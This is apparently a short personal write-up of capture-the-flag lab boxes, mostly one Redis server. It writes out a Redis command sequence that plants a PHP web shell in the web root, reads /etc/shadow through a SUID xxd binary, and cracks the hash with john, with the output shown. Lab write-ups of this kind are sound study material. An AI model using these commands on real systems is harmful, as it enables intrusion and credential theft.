I did watcher, it was okay but nothing to write about. We had LFI to get FTP creds, upload a PHP reverse shell using the FTP account then include it for RCE, then a few different things to move between users but nothing exciting.


Hack into a vulnerable database server with an in-memory data-structure in this semi-guided challenge!

This was a redis box, pretty simple. I mostly want to record the RCE step, which wasn’t guided. I followed this like so, with telnet:

└─# telnet 6379
Connected to
Escape character is '^]'.
# Server
# etc
config set dir /var/www/html 
config set dbfilename cmd.php
set test "<?php system($_GET['cmd']);?>"


Using the python reverse shell. Privesc was via the SUID bit on XXD to read /etc/shadow and break a password for our user from the sudoers group:

www-data@ubuntu:/dev/shm$ LFILE=/etc/shadow 
www-data@ubuntu:/dev/shm$ xxd "$LFILE" | xxd -r
xxd "$LFILE" | xxd -r

Which then was:

└─# john hash -w=/usr/share/wordlists/rockyou.txt 
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beautiful1       (?)
1g 0:00:00:00 DONE (2021-02-19 03:58) 1.754g/s 2245p/s 2245c/s 2245C/s kucing..poohbear1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Anyway the redis part was relevant.